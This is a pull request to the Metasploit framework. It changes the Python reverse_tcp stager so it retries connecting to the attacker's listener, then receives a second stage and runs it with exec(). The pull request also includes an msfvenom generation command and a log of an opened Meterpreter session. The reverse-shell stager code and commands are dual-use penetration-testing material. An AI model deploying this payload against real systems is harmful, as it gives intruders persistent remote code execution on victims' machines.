### PR TITLE
Exception handling in reverse_tcp python payload and adding a retry option while generating payload.

### DIFF
--- a/lib/msf/core/payload/python/reverse_tcp.rb
+++ b/lib/msf/core/payload/python/reverse_tcp.rb
@@ -44,24 +44,30 @@ module Payload::Python::ReverseTcp
 
   def generate_reverse_tcp(opts={})
     # Set up the socket
-    cmd  = "import socket,struct\n"
-    cmd << "import time\n"
-    cmd << "def connect():\n"
-    cmd << "\ttry:\n"
-    cmd << "\t\ts=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2
-    cmd << "\t\ts.connect(('#{opts[:host]}',#{opts[:port]}))\n"
+    cmd  = "import socket,struct#{datastore['StagerRetryWait'].to_i > 0 ? ',time' : ''}\n"
+    if datastore['StagerRetryWait'].blank? # do not retry at all (old style)
+      cmd << "s=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2
+      cmd << "s.connect(('#{opts[:host]}',#{opts[:port]}))\n"
+    else
+      cmd << "while 1:\n"
+      cmd << "\ttry:\n"
+      cmd << "\t\ts=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2
+      cmd << "\t\ts.connect(('#{opts[:host]}',#{opts[:port]}))\n"
+      cmd << "\t\tbreak\n"
+      cmd << "\texcept:\n"
+      if datastore['StagerRetryWait'].to_i <= 0
+        cmd << "\t\tpass\n" # retry immediately
+      else
+        cmd << "\t\ttime.sleep(#{datastore['StagerRetryWait'].to_i})\n" # retry after waiting
+      end
+    end
     cmd << py_send_uuid if include_send_uuid
-    cmd << "\t\tl=struct.unpack('>I',s.recv(4))[0]\n"
-    cmd << "\t\td=s.recv(l)\n"
-    cmd << "\t\twhile len(d)<l:\n"
-    cmd << "\t\t\td+=s.recv(l-len(d))\n"
-    cmd << "\t\texec(d,{'s':s})\n"
-    cmd << "\texcept Exception:\n"
-    cmd << "\t\t\ttime.sleep(#{opts[:retry_wait]})\n"
-    cmd << "\t\t\tconnect()\n"
-    cmd << "connect()\n"
-    
-
+    cmd << "l=struct.unpack('>I',s.recv(4))[0]\n"
+    cmd << "d=s.recv(l)\n"
+    cmd << "while len(d)<l:\n"
+    cmd << "\td+=s.recv(l-len(d))\n"
+    cmd << "exec(d,{'s':s})\n"
+            
     py_create_exec_stub(cmd)
   end
 

--- a/lib/msf/core/payload/python/reverse_tcp.rb
+++ b/lib/msf/core/payload/python/reverse_tcp.rb
@@ -16,6 +16,14 @@ module Payload::Python::ReverseTcp
   include Msf::Payload::Python
   include Msf::Payload::Python::SendUUID
 
+  def initialize(*args)
+    super
+    register_advanced_options([
+        OptInt.new('StagerRetryCount', [false, 'The number of times the stager should retry if the first connect fails (zero to infinite retries)', 1]),
+        OptInt.new('StagerRetryWait', [false, 'Number of seconds to wait for the stager between reconnect attempts'])
+      ], self.class)
+  end
+
   #
   # Generate the first stage
   #
@@ -44,21 +52,24 @@ module Payload::Python::ReverseTcp
 
   def generate_reverse_tcp(opts={})
     # Set up the socket
-    cmd  = "import socket,struct#{datastore['StagerRetryWait'].to_i > 0 ? ',time' : ''}\n"
-    if datastore['StagerRetryWait'].blank? # do not retry at all (old style)
+    cmd  = "import socket,struct#{opts[:retry_wait].to_i > 0 ? ',time' : ''}\n"
+    cmd << "counter = 0\n"
+    if opts[:retry_wait].blank? # do not retry at all (old style)
       cmd << "s=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2
       cmd << "s.connect(('#{opts[:host]}',#{opts[:port]}))\n"
     else
-      cmd << "while 1:\n"
+      cmd << "while counter<#{opts[:retry_count].to_i}:\n"
       cmd << "\ttry:\n"
       cmd << "\t\ts=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2
       cmd << "\t\ts.connect(('#{opts[:host]}',#{opts[:port]}))\n"
       cmd << "\t\tbreak\n"
       cmd << "\texcept:\n"
-      if datastore['StagerRetryWait'].to_i <= 0
+      if opts[:retry_wait].to_i <= 0
+        cmd << "\t\tcounter=counter+1\n"
         cmd << "\t\tpass\n" # retry immediately
       else
-        cmd << "\t\ttime.sleep(#{datastore['StagerRetryWait'].to_i})\n" # retry after waiting
+        cmd << "\t\ttime.sleep(#{opts[:retry_wait]})\n" # retry after waiting
+        cmd << "\t\tcounter=counter+1\n"
       end
     end
     cmd << py_send_uuid if include_send_uuid

--- a/lib/msf/core/payload/python/reverse_tcp.rb
+++ b/lib/msf/core/payload/python/reverse_tcp.rb
@@ -19,8 +19,8 @@ module Payload::Python::ReverseTcp
   def initialize(*args)
     super
     register_advanced_options([
-        OptInt.new('StagerRetryCount', [false, 'The number of times the stager should retry if the first connect fails (zero to infinite retries)', 0]),
-        OptInt.new('StagerRetryWait', [false, 'Number of seconds to wait for the stager between reconnect attempts'])
+        OptInt.new('StagerRetryCount', [false, 'The number of times the stager should retry if the first connect fails (zero to infinite retries)', 10]),
+        OptInt.new('StagerRetryWait', [false, 'Number of seconds to wait for the stager between reconnect attempts',5])
       ], self.class)
   end
 

--- a/modules/payloads/stagers/python/reverse_tcp.rb
+++ b/modules/payloads/stagers/python/reverse_tcp.rb
@@ -11,7 +11,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module MetasploitModule
 
-  CachedSize = 362
+  CachedSize = 454
 
   include Msf::Payload::Stager
   include Msf::Payload::Python::ReverseTcp

--- a/modules/payloads/stagers/python/reverse_tcp.rb
+++ b/modules/payloads/stagers/python/reverse_tcp.rb
@@ -11,7 +11,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module MetasploitModule
 
-  CachedSize = 378
+  CachedSize = 362
 
   include Msf::Payload::Stager
   include Msf::Payload::Python::ReverseTcp

--- a/modules/payloads/stagers/python/reverse_tcp.rb
+++ b/modules/payloads/stagers/python/reverse_tcp.rb
@@ -11,7 +11,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module MetasploitModule
 
-  CachedSize = 362
+  CachedSize = 378
 
   include Msf::Payload::Stager
   include Msf::Payload::Python::ReverseTcp

--- a/modules/payloads/stagers/python/reverse_tcp.rb
+++ b/modules/payloads/stagers/python/reverse_tcp.rb
@@ -11,7 +11,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module MetasploitModule
 
-  CachedSize = 362
+  CachedSize = 502
 
   include Msf::Payload::Stager
   include Msf::Payload::Python::ReverseTcp

--- a/modules/payloads/stagers/python/reverse_tcp.rb
+++ b/modules/payloads/stagers/python/reverse_tcp.rb
@@ -11,7 +11,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module MetasploitModule
 
-  CachedSize = 502
+  CachedSize = 362
 
   include Msf::Payload::Stager
   include Msf::Payload::Python::ReverseTcp

--- a/modules/payloads/stagers/python/reverse_tcp_uuid.rb
+++ b/modules/payloads/stagers/python/reverse_tcp_uuid.rb
@@ -11,7 +11,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module MetasploitModule
 
-  CachedSize = 466
+  CachedSize = 606
 
   include Msf::Payload::Stager
   include Msf::Payload::Python

--- a/modules/payloads/stagers/python/reverse_tcp_uuid.rb
+++ b/modules/payloads/stagers/python/reverse_tcp_uuid.rb
@@ -11,7 +11,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module MetasploitModule
 
-  CachedSize = 466
+  CachedSize = 558
 
   include Msf::Payload::Stager
   include Msf::Payload::Python

--- a/modules/payloads/stagers/python/reverse_tcp_uuid.rb
+++ b/modules/payloads/stagers/python/reverse_tcp_uuid.rb
@@ -11,7 +11,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module MetasploitModule
 
-  CachedSize = 482
+  CachedSize = 466
 
   include Msf::Payload::Stager
   include Msf::Payload::Python

--- a/modules/payloads/stagers/python/reverse_tcp_uuid.rb
+++ b/modules/payloads/stagers/python/reverse_tcp_uuid.rb
@@ -11,7 +11,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module MetasploitModule
 
-  CachedSize = 466
+  CachedSize = 482
 
   include Msf::Payload::Stager
   include Msf::Payload::Python

--- a/modules/payloads/stagers/python/reverse_tcp_uuid.rb
+++ b/modules/payloads/stagers/python/reverse_tcp_uuid.rb
@@ -11,7 +11,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module MetasploitModule
 
-  CachedSize = 606
+  CachedSize = 466
 
   include Msf::Payload::Stager
   include Msf::Payload::Python


### PR DESCRIPTION
## Updating the python reverse_tcp payload with enhanced exception handling 

## Description :-

This update incorporates error handling in the python reverse_tcp payload. One of the problems  faced is that the server needs to always be in the listening state while the payload is executed on the victim's computer. This exception handling lets the server start it's listener on it's own time as the function of connecting will get executed at every five seconds of time until the server successfully connects to the client. This provides us with the solution to the problem that the client may execute the payload at a different time and the server may start connecting to the client at a different time unlike before where the server needed to set up a listener before the client executed the payload.

## Verification :-

### Generate the reverse_tcp payload :-
```./msfvenom -p python/meterpreter/reverse_tcp LHOST="127.0.0.1" LPORT=4444 > /root/Desktop/newexploit.py```

### Execute the python payload without setting up the listener on msfconsole :-

```python newexploit.py```

### Open msfconsole  :-

- [x] Start `msfconsole`
- [x] `use exploit/multi/handler`
- [x] `set LHOST`
- [x] `set LPORT`
- [x] `run`

```
[*] Started reverse TCP handler on 127.0.0.1:4444 
[*] Starting the payload handler...
[*] Sending stage (39832 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:39220) at 2017-04-21 23:38:35 +0530

meterpreter > sysinfo
Computer        : kali
OS              : Linux 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21)
Architecture    : x64
System Language : en_IN
Meterpreter     : python/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 127.0.0.1 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(handler) > exploit

[*] Started reverse TCP handler on 127.0.0.1:4444 
[*] Starting the payload handler...
[*] Sending stage (39832 bytes) to 127.0.0.1
[*] Meterpreter session 2 opened (127.0.0.1:4444 -> 127.0.0.1:39228) at 2017-04-21 23:39:49 +0530

meterpreter > 
```
